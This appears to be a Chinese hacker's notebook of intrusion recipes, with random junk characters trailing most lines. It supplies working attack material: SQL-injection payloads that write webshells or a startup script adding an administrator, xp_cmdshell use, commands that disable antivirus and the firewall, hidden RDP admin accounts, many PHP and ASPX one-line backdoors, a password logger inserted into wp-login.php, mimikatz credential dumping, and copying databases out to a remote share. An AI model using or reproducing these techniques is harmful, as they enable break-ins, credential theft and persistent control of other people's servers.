create table a (cmd text);; K: n; a1 \4 R" c
insert into a values ("set wshshell=createobject (""wscript.shell"") " );/ Y" [3 }+ P% F8 p/ }. E
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );# n& S7 ^2 f* C- r9 y: T$ Z6 V& A
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );5 v2 e* ^! l6 m& \
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";4 o1 ^3 ~0 f M5 u
drop table a;
9 L1 [0 E4 C! N+ d& I4 N6 Q7 ~, E% C. f; [+ @
英文版本:
4 v5 K) V6 Q2 S4 e% r, ?2 l& F: s2 J
use test;
# D: E3 z/ w! h# screate table a (cmd text);
# b8 {3 o5 ?( O- e3 w7 B/ p$ C `insert into a values ("set wshshell=createobject (""wscript.shell"") " );
+ p5 u8 ?3 X( R- {insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );7 z' [: m" ~. e9 k0 Q
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
& a8 w7 j0 T# ]: x) Cselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
: b. Z8 i& K3 d0 Edrop table a;8 q( v. S8 T2 R. t
l/ i$ U7 J ?* o3 Gcreate table a (cmd BLOB);% ?+ {1 C* O6 L) J
insert into a values (CONVERT(木马的16进制代码,CHAR));
0 k6 U' v7 H L" ^6 l+ O) E9 y; Cselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'% l6 z0 C+ d. {$ {/ ]9 K$ s
drop table a;" E- N" g, |! L: M g8 u1 G$ @
5 m7 q0 t: B1 ` y$ m3 F$ _3 ?记录一下怎么处理变态诺顿
& `* n2 |/ Q- j! z" d' ]查看诺顿服务的路径% H, a1 t% p0 g7 H, z
sc qc ccSetMgr
$ x1 L- l: u' W/ t9 w( Z( Q然后设置权限拒绝访问。做绝一点。。
, r: [0 `5 X" k" k0 Ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
+ N& X3 ]' I/ `2 U+ q( xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
" e: A( E7 g Ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators- d1 N2 Z$ @# v, M1 t- x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
. N% m4 V6 s% a8 [( ], m
' T% F6 q) E2 }6 c然后再重启服务器9 h8 H. y. J* y4 |% P5 s2 ]2 A
iisreset /reboot/ `4 ?5 [. F5 i% ]( {9 K# ?
这样就搞定了。。不过完事后。记得恢复权限。。。。* r& R) e/ T8 ^ d$ L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
- | Z( w3 D0 R& @5 y7 ^cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F4 t( y' s' z$ O2 ? A+ c' ]1 t
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F$ c% x3 ?' A8 L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
. O) H- `, L; l3 J+ A$ B% cSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin! u& A \/ a3 C# N8 ?# w |
% a" [ W5 A: `" m4 B: Y! }; n
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
/ g8 ]% Z) \5 {9 u \6 ^& G/ p. v$ ]
postgresql注射的一些东西( X" e: t; U+ U. q, G% D* _
如何获得webshell
9 N9 W3 A+ k1 D9 {& F' [0 L0 phttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); . y; o# U, ^6 @+ f( I9 f9 c' b/ M1 u
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); x8 g, B, G; ^6 u( m/ ^1 Q
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;6 [$ \5 S$ J9 C7 q
如何读文件
3 ]: Z0 I$ l( p& d5 Y+ thttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);# l' e; P' N S( I$ P: G
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;% M4 k1 m8 D- ~2 _2 l7 _
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
- x: k- `$ X$ c! e
* l/ {- O) a# }* g; W3 sz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。% D; f, C# m) B* l& m* P
当然,这些的postgresql的数据库版本必须大于8.X
. }' B9 Q5 O5 B创建一个system的函数:
6 A/ l- w6 [4 z: N! ICREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT' t; z2 E& N7 @6 P- e: R
6 P9 a1 S, y# \6 o, q; k
创建一个输出表:% e* x! v0 q5 x
CREATE TABLE stdout(id serial, system_out text)
0 f" B; u9 r3 W7 c$ J! ]; X# m8 u F+ x3 i' T& s% Q- L& D7 g7 J
执行shell,输出到输出表内:
# J' S. y+ V5 A' z7 t5 N. ~SELECT system('uname -a > /tmp/test')
9 Y3 k t6 u& B) y+ ~$ g4 m6 ^& N4 b1 j7 `$ v; C
copy 输出的内容到表里面;- K4 R- t0 {4 P9 Z
COPY stdout(system_out) FROM '/tmp/test'
* @2 H& ^, ]3 F2 o) n6 h/ }! i. w* l, S9 ^- p9 O# y
从输出表内读取执行后的回显,判断是否执行成功1 u9 p/ L" P1 B: O; V3 t* \
! D# B- G0 n! {9 h; U: c- B/ m! x% wSELECT system_out FROM stdout
/ {# ]3 Y. ?; O( n! A( z8 ^& Q下面是测试例子% j1 B2 E A$ p+ d: x1 I0 v
, t+ W5 K" K) R) C/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- o7 |% |: V7 w# o+ @2 S
r2 ^0 J, ~' v/ y
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C': R) O# K- Y0 e& ?
STRICT --# M1 x, j4 \8 Q8 B7 `0 c& H2 R# C
8 E8 q$ t7 m' w) b1 y3 N1 j/store.php?id=1; SELECT system('uname -a > /tmp/test') --+ ?0 B- h& t) ~. a3 I# @- }
& v+ e) j1 E. n: b. [. B! ?5 C/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --6 M9 x% w# {4 f' i/ b, C+ h
4 S- E; P/ S& e* o0 Y% c+ X- M+ V/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
! m! H+ h' i( E/ z1 w4 v* w' z6 Anet stop sharedaccess stop the default firewall
$ Y2 y! z h2 [! W ^1 B0 K$ Bnetsh firewall show show/config default firewall
0 Q1 b' b, l' lnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
3 C, f( R/ j7 H$ Ynetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall5 M4 J* s+ b- a9 B8 T. D1 s( j
修改3389端口方法(修改后不易被扫出)" y, S4 G! K" s! D: b5 A
修改服务器端的端口设置,注册表有2个地方需要修改
! H8 M3 m. o6 ?8 L+ L0 |" y; k$ h$ r
+ ` u/ _0 D' n1 u[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]0 V; m- Y7 R0 j" q7 v$ |5 a3 T, i
PortNumber值,默认是3389,修改成所希望的端口,比如6000
) C* C, F1 V3 M$ U1 S9 z6 o5 w. [" x) e* P' K9 R
第二个地方:+ S' r) L( L& P; ~$ D6 G4 p0 E% `
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
3 ~% I C' E" D1 R) }! lPortNumber值,默认是3389,修改成所希望的端口,比如6000* B- R% i/ {0 N1 u
5 ^1 g# V; h$ \$ V
现在这样就可以了。重启系统就可以了& i* Q, H+ f; ]7 b' s
: ^* t& Q+ I$ q- |8 z7 M6 K
查看3389远程登录的脚本
& U' m9 T, | w( Q& C. e) s保存为一个bat文件/ H+ p: H/ q4 \0 J5 C6 J
date /t >>D:\sec\TSlog\ts.log
% m- \& {: B3 \# {time /t >>D:\sec\TSlog\ts.log
# C2 O0 y( o$ Q3 c+ Tnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log) ?% ] m0 }6 \% b6 K* f, L
start Explorer
$ x( h; }. Z& i" V/ p4 F9 m% g7 Y: l8 Z2 `5 Q
mstsc的参数:
/ l8 D7 b; b( B
$ @/ p- }( Y. W; e远程桌面连接3 N, P, p- g; w# }- e
9 b# P( G/ A+ |( BMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]6 R, e/ H" M- X
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
+ d$ L. A. X9 ` n* t$ p2 p/ i" r7 ?8 c6 j6 n
<Connection File> -- 指定连接的 .rdp 文件的名称。
6 q0 I# \. \4 w8 L5 z* h- j @" M7 P: g! g% l: a
/v:<server[:port]> -- 指定要连接到的终端服务器。' j7 C0 f# B3 }% u# b
( f9 s w% N U6 Z( O; }7 g( A: q/console -- 连接到服务器的控制台会话。
z+ d B( M, Z6 @
' J! Z: t- }# H0 p$ t/f -- 以全屏模式启动客户端。
, ~+ S$ E2 j4 X+ w" j) g. W" X$ t0 B
/w:<width> -- 指定远程桌面屏幕的宽度。
4 b# m) H4 ~0 k+ d. {
3 ^- G0 h' v# d. S/h:<height> -- 指定远程桌面屏幕的高度。' d% w; q1 N/ z
+ Y& ~' f: M; O2 J
/edit -- 打开指定的 .rdp 文件来编辑。
. I# Q' d# ^; l0 h0 |0 w/ }+ G8 |3 j' V' \1 x$ x
/migrate -- 将客户端连接管理器创建的旧版9 P8 z4 u4 G1 I- O
连接文件迁移到新的 .rdp 连接文件。* R+ X) z3 B j( C) x e
+ n) ]7 r e1 M: K, w! {2 ^
% X+ H2 H I+ L- A8 }
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就, c; a, n8 k- i/ k
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
- e7 A, r# o9 s' u" C5 o' m) x( z
0 r) A) p& v/ ^$ o& \命令行下开启3389
, M: A) L' L+ p3 \6 p% anet user asp.net aspnet /add
2 f1 ~# s3 P. L! F: }net localgroup Administrators asp.net /add
: L* M& B+ b) V- Y$ C! t! h6 Dnet localgroup "Remote Desktop Users" asp.net /add# N: N% |3 h( ?% p. v( o
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D' Y U0 ]$ A; E0 Z% E& Z
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
, h5 ~! x& k! i1 F Eecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1- S5 a0 I/ r1 q2 }. p( S
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f$ X9 E6 B& m! K7 {: e6 e7 B/ |
sc config rasman start= auto! i, z0 H3 p+ T8 {. _
sc config remoteaccess start= auto
. p2 Z$ g: }: u/ T+ Z3 pnet start rasman* g/ J! c/ |2 o. W5 m
net start remoteaccess
1 ~. ]7 B: E: j# K) R+ SMedia
2 U1 {# x$ w9 y0 _; s" q6 f' f/ s/ F, t<form id="frmUpload" enctype="multipart/form-data"
1 w( S% [9 D1 H6 ]action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>7 a- l' ^2 j' a* F6 Z2 X! |; S$ f6 o
<input type="file" name="NewFile" size="50"><br>
0 M& @7 c; ]9 l* M! ]. i<input id="btnUpload" type="submit" value="Upload">4 k& ]* v0 M7 H0 Y) D$ C: u
</form>' z8 }# S" V$ q7 V8 B$ y0 T) w
( i2 B7 O9 U( e/ Q
control userpasswords2 查看用户的密码
, a8 O0 K3 K! i* Y/ J8 m# Jaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
2 l- [# B" U* X: NSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a( O& a( w, L. p- w
( a& M* q* E* `4 o3 V; v. K9 f
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:- J( J1 m8 U' A7 v' [: Q; B2 Z
测试1:8 T5 N5 U) ~3 w! @- S0 t
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1. `4 [8 Q% N& I( t$ t
! Z5 ]7 B5 y+ E测试2:! P$ J' S) B( b$ k+ G! c
4 A) V4 X4 _ v9 r* \1 G/ K+ o
create table dirs(paths varchar(100),paths1 varchar(100), id int)
/ C1 d1 y& S3 l" N' f7 V0 V$ v
" {7 w; H: z! j$ i9 h- _delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
2 n" u3 C2 ~8 V0 {% W+ D: p
; s) ~6 a7 i9 B$ PSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1! n; n/ \/ h5 z: D
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
9 g8 c0 l/ M) h( `' s" }* f$ p可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
" `$ _! Z3 ^4 C. G) S( _4 [$ Nnet stop mcafeeframework
; h$ ]% ?( Q0 j5 Y& pnet stop mcshield
8 M/ g, q" k* d: ?! e+ J. Q5 znet stop mcafeeengineservice
9 p, B. I0 z& S+ [( M. ~net stop mctaskmanager6 B7 ?# a( B8 f$ R) _
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
/ Y; Q& M2 M" S
* ~6 d5 D: r) u- H VNCDump.zip (4.76 KB, 下载次数: 1)
6 x* J5 x& C" Q) s* E密码在线破解http://tools88.com/safe/vnc.php
8 N( h; d! Y1 ~7 e7 j- {- cVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
* d v; J. a: l: q) ^% U4 X; z' J6 E- R- u: j }9 E8 E! [ t& W
exec master..xp_cmdshell 'net user'
3 p" T4 h$ B' W/ {7 U: E9 j- y. ]: gmssql执行命令。
: a( |/ W3 `/ R9 H: y获取mssql的密码hash查询
3 D4 Y8 B6 Q" Z( K q* wselect name,password from master.dbo.sysxlogins
4 e( s9 K0 _1 c* p( q( l' j3 L1 w
# Q2 o" G9 E* l2 b& |backup log dbName with NO_LOG;
# X! ^% Y6 _+ Kbackup log dbName with TRUNCATE_ONLY;
4 o9 V2 h, j2 T2 o; z: _+ RDBCC SHRINKDATABASE(dbName);: [9 P; A5 Y: W, ]3 [- O
mssql数据库压缩
3 q4 I$ y8 l, ^6 }: g9 @" a
; L$ { B) r7 kRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
2 {0 N4 [: \. a# x; h/ r% Z将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。" x, E P$ ~8 g, k+ r
$ O" J5 `3 Z4 K3 l: C8 n/ Vbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
/ G a3 O+ d5 q备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
+ b: A/ ~) l/ I% d; a7 ^+ c. z9 G) I9 A* r* {( v
Discuz!nt35渗透要点:
! N0 ]0 M: N e(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default9 w2 T/ j' b3 n
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>% M6 T! p) w7 `+ d# r; e3 D
(3)保存。 b; o! x" k1 B: E Q' x2 t( s E
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
2 R/ I1 R/ I2 g: y8 G6 @& xd:\rar.exe a -r d:\1.rar d:\website\
6 v' b; |3 E: u& Z8 F0 L, _递归压缩website
& R; T. ]$ j9 @3 k& G注意rar.exe的路径
' c! G' o" h% o4 N2 @) Y# F% c; Z9 @2 F; C3 b6 U
<?php
1 w; r8 R/ Q+ v5 L' g5 ~) I4 r
' X" U d3 f4 c- A8 c$telok = "0${@eval($_POST[xxoo])}";
3 r) _6 B. n; E7 ?8 N1 y. z2 }, C; H) j2 J9 ^2 c9 o+ O
$username = "123456";; `' c; @- I2 ?4 ?6 Z
8 J. }9 {2 \+ e7 P4 ?1 W% t5 I6 y
$userpwd = "123456";
, ~9 W& F+ p, ]1 W
: G' q" r6 U! V5 a6 m! h0 [, _9 R$telhao = "123456";
- E: u( w6 q* J# r; e: O- K n
* `- D) r, ^# J! X7 M) |% _$telinfo = "123456";3 ]4 m+ v1 U* @8 B3 r
9 j; d1 \& H- q( N/ x9 C
?>
: a2 M! g! e; A$ W' Tphp一句话未过滤插入一句话木马& A$ l) |" A% b: X( @! I. |
0 ~; [: c" V# r
站库分离脱裤技巧: [+ k+ C- M$ e
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
/ X4 {0 T7 C8 O- Z8 `0 |exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
0 q+ h+ ?$ O) P& i, y8 i条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。5 k% U1 j. A! H! m, _' B
这儿利用的是马儿的专家模式(自己写代码)。
, n) `9 Y- n6 fini_set('display_errors', 1);5 v# R3 ^1 R8 l
set_time_limit(0);; v3 s" j" L# l4 n, ^: \
error_reporting(E_ALL);
3 U- o' p& a) }4 R. x) X( l$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());9 y3 P4 o5 A) `: B- n+ {7 V
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());/ j0 B w2 _9 S/ b+ E' f
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
& U( S3 i6 T/ B( ?2 t$i = 0;
0 _% g3 i0 U: D4 t- S$tmp = '';% ?6 Z4 Y. l Z' P8 l. J% l; Z) s
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {9 S* r- \) U! ]! X* }2 f; W
$i = $i+1;
7 O. ~5 s. G+ |2 y $tmp .= implode("::", $row)."\n";
s% k5 ~+ l! [ if(!($i%500)){//500条写入一个文件
0 \/ \, Z5 c( ^$ ?5 a $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
# l# M3 D! l, w file_put_contents($filename,$tmp);
" |( \0 ?% d. i; B! U ~4 b $tmp = '';5 D7 X8 b; ]" N! B& v
}! P- [6 b' Z o# Q
}( v7 k2 [! o- G0 T1 F7 C& N
mysql_free_result($result);. g2 [9 t7 ?2 o/ o7 s9 w
! D' O& ^2 n4 J d* N& x* e F
0 w% m8 }1 q/ W/ E3 Q
1 @+ a4 q2 }3 A- [: Z N: @//down完后delete n& g c. p0 T A
+ Y7 z/ c- ]' t% X( w) K
2 j% W- T+ z4 W" Rini_set('display_errors', 1);; f: ^, v5 J* q- A5 D z6 A) X
error_reporting(E_ALL);
- b$ d' F5 f& N+ v: Q/ h& E0 x* Z$i = 0;
2 V/ o2 x/ X# i4 R5 Fwhile($i<32) {
0 e" m% T! V' l $i = $i+1;
9 v; e* O4 c; s3 N; l5 x m $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';) O) I/ ?3 f r+ V
unlink($filename);
6 M v) F) z( U. @}
" |. S X1 w4 m- g. B$ D" phttprint 收集操作系统指纹 K: ~( `5 P0 M. g' M f1 h
扫描192.168.1.100的所有端口
. F8 D1 u* ^+ M' \nmap –PN –sT –sV –p0-65535 192.168.1.100: V* ?: K9 {2 Z- y( W* C, w# u
host -t ns www.owasp.org 识别的名称服务器,获取dns信息& u7 {# J! V# I' r2 Z3 z
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
+ P+ u# }6 f, n- `$ |7 T! {Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
& G3 ^" u8 ]6 b2 h! P1 w3 U! t2 f& F( o
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
I1 c! C& H: ]! D Q' q2 E! I0 i+ m$ Y1 S6 i) l: V7 _
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
! k/ y# x" P8 W5 r$ n$ |+ V1 t; P( \& D1 [) m ?: f& _, R
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
: m$ v, y: l" N& K0 S6 _7 f
' q, ~7 {, ?0 Z# J DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)( w5 L G6 a. F" t5 x, M
$ C9 V) u' z; R4 J: N http://net-square.com/msnpawn/index.shtml (要求安装)
$ p5 y% q* U A9 z, S5 W: G5 L! Q: f1 [- F" `
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
7 v- z( d- ^ K5 \& d% }' I$ R
! L- m3 h$ i: F5 i SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
6 L; k, t; y7 j) rset names gb2312
; n: q9 f; A* w6 M- m导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
7 L: f% V, A. _+ f+ N. g$ |( b0 t# w. I2 g; s4 S
mysql 密码修改
s; M6 y% D/ I1 eUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 7 M& _% q& M) v3 E5 o
update user set password=PASSWORD('antian365.com') where user='root';
) s6 S7 e- N0 c2 P2 F* N8 ]6 Xflush privileges;2 R5 N4 h; W6 ~" J# d; T; o
高级的PHP一句话木马后门# r9 }; N! ~/ y7 ]
, f# [ o! y S% ?1 \, R4 @
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
0 }) ~, u2 y4 M2 `1 @7 k: K. Y4 w/ p; f3 n- |; u' T
1、6 O4 [7 d! t H. D: Q
4 Z; R: g0 G2 }
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
, b6 I2 b- [+ p9 _: M. u/ F
1 I8 I$ D/ C$ U7 C$hh("/[discuz]/e",$_POST['h'],"Access");7 t, i E! t+ t; D* M2 ~
0 B6 F" U% p: X//菜刀一句话6 h8 I$ G7 J5 D. l0 n' L5 x! c
$ @% p' @8 s2 @5 |" `2、, Q% Q) i2 ]0 U/ ^2 Q5 l1 _8 {
) r' m* o% e- T$ U- R) l4 A0 n+ s
$filename=$_GET['xbid'];
+ Z4 x! t3 |$ T" W: }+ `0 R
$ E+ M- Z# q: i: n, \include ($filename);
' y+ W' Z: Q$ L3 G" r/ M
3 _; G# B8 i2 B- {7 u//危险的include函数,直接编译任何文件为php格式运行
% U8 D+ @% \& m% W4 }; y
7 {) Z$ D G( j# V! f. C5 N3、
2 d7 Q% q( `2 ]
2 F4 Q# Z7 M" B ?/ a( x$reg="c"."o"."p"."y";) s: t2 ~. k" {/ W a* w
' S2 a1 [0 J9 f
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
4 l& z# r4 ~! \3 g$ y
# [0 w$ N/ T1 O$ r//重命名任何文件& Y. o9 I# }0 }
! C- k6 s$ \+ _& L9 o
4、% N6 R& ^# p/ A% X. \' N& }( l
* H8 u( k0 ?. E- c, U
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";2 u) S- B. l* i5 v3 V
* j0 T' V% [% l: z) ^ A: X$gzid("/[discuz]/e",$_POST['h'],"Access");9 d: L7 g* Y" s% Y( u* ^2 ~( B
: \+ a2 U; U" {) h
//菜刀一句话, H7 R! x1 I1 F3 F f3 V
& M& T. o5 m- {2 ^% G+ G5 x9 h
5、include ($uid);4 m2 r$ Q+ A) p% N
6 g/ B; F) H& W
//危险的include函数,直接编译任何文件为php格式运行,POST ! l; O, A: ]; I3 W- s
I' N' ?$ _# A$ C& W O. |! l
/ i, p! `7 G+ F; W6 f8 s//gif插一句话: T) t+ n! X5 M! y
. r1 Y( A1 l" E, r: s, {: ?
6、典型一句话7 o: {" K( G0 K+ b
" r5 j. a8 M7 g2 [程序后门代码: O- L& d6 V2 L) N# T9 u4 W" P" t- ~
<?php eval_r($_POST[sb])?>
2 W% N& k6 B5 c: C程序代码
5 M5 V, i2 a8 u" _6 u<?php @eval_r($_POST[sb])?>
! a! W$ K: C9 t. w" w6 T//容错代码
( B1 z7 Z. t1 i/ I# W5 A程序代码7 ~$ A2 F7 v4 M/ S
<?php assert($_POST[sb]);?>
/ W& P, [' i: |% C5 G* Q3 D//使用lanker一句话客户端的专家模式执行相关的php语句
0 i; c, @+ h8 V. O) _程序代码. L8 N" C) [4 `6 e
<?$_POST['sa']($_POST['sb']);?>" G) J @( ~9 y3 q2 T3 L
程序代码$ D) D( n3 M% T& M
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
4 c; j& q4 I* X H程序代码
! Z3 L8 z% j" m7 z<?php& _3 l) z7 E' m- U5 C
@preg_replace("/[email]/e",$_POST['h'],"error");( u$ K- i8 D' A. C
?>
7 y0 v5 E$ F1 U6 k0 |% z- z4 f8 p//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入6 O! U: [6 P# d, `4 |7 T
程序代码
, n; \4 U4 ~ h \4 r<O>h=@eval_r($_POST[c]);</O>
" d! V+ F6 ` A6 b7 {$ T9 E& a5 L程序代码. ]8 g2 Q' j7 d# r
<script language="php">@eval_r($_POST[sb])</script>
# X8 D/ M2 Y& p$ J# C: y//绕过<?限制的一句话
+ C2 [( C8 h; V; `( W/ D2 W. _5 \4 c; F% J8 o. e
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
' R9 E' K. r2 l; m% O详细用法:- r# w8 x: ^/ _/ i( g
1、到tools目录。psexec \\127.0.0.1 cmd2 |$ Q% N- V7 e3 o' j# N: z- t
2、执行mimikatz9 N' L' B* k' q) N$ M
3、执行 privilege::debug
& v+ T! X% H C$ }- D/ ?4、执行 inject::process lsass.exe sekurlsa.dll- _0 [' w8 G, O
5、执行@getLogonPasswords
! F i4 F3 h7 O: s2 Q2 o; _0 i3 L; B5 T6、widget就是密码
+ A8 `- `! M4 }' M* @7、exit退出,不要直接关闭否则系统会崩溃。; D9 c% Q) k: [
, e- c' Q# u% K& h! P/ [/ }http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
0 _6 Z4 {4 y' L/ h+ B X( a
! ^4 n4 x0 a5 _* U; C1 t* }自动查找系统高危补丁
+ t+ [( w' r; K4 W6 Qsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
2 E) k, K+ Z* W1 B, K- }- u2 e* A/ i% a. B% I; U2 C
突破安全狗的一句话aspx后门
& f e: y4 f/ E+ e9 A3 H4 G<%@ Page Language="C#" ValidateRequest="false" %>& s2 z/ }. ~' K0 W/ N9 H+ b: v
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> J) Y0 f" p6 `3 o- G2 k0 Z4 ^
webshell下记录WordPress登陆密码
. b) r$ ]' m2 |( Q5 _3 vwebshell下记录Wordpress登陆密码方便进一步社工
* t/ T7 m2 ] h. V# Z在文件wp-login.php中539行处添加:
4 _* T" U# @9 V// log password d7 {$ O" i2 ~/ E1 e
$log_user=$_POST['log'];
- M5 h3 E0 Z/ ?. _! v" ^/ h4 N$log_pwd=$_POST['pwd'];
6 R+ D% ?: H; r& C9 x$log_ip=$_SERVER["REMOTE_ADDR"];
8 `% M. d5 t6 E) C+ S- F9 j$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
; r6 F1 X9 z& n5 C u( @3 U$txt=$txt.”\r\n”;& ]) [/ F" s C5 M+ C
if($log_user&&$log_pwd&&$log_ip){" F9 W) d& O, j
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
) f, o6 G- M* e, V% g9 N r}
2 [* v& I* v3 h' W+ h! n! z$ d. t当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。; N, I" V" E0 U
就是搜索case ‘login’4 |* ^+ {4 j5 g! d6 a3 P
在它下面直接插入即可,记录的密码生成在pwd.txt中,
4 F- @) D1 f4 ^/ q1 Y5 M* d( d其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录5 {9 A3 y- F4 C5 @% A; ?
利用II6文件解析漏洞绕过安全狗代码:
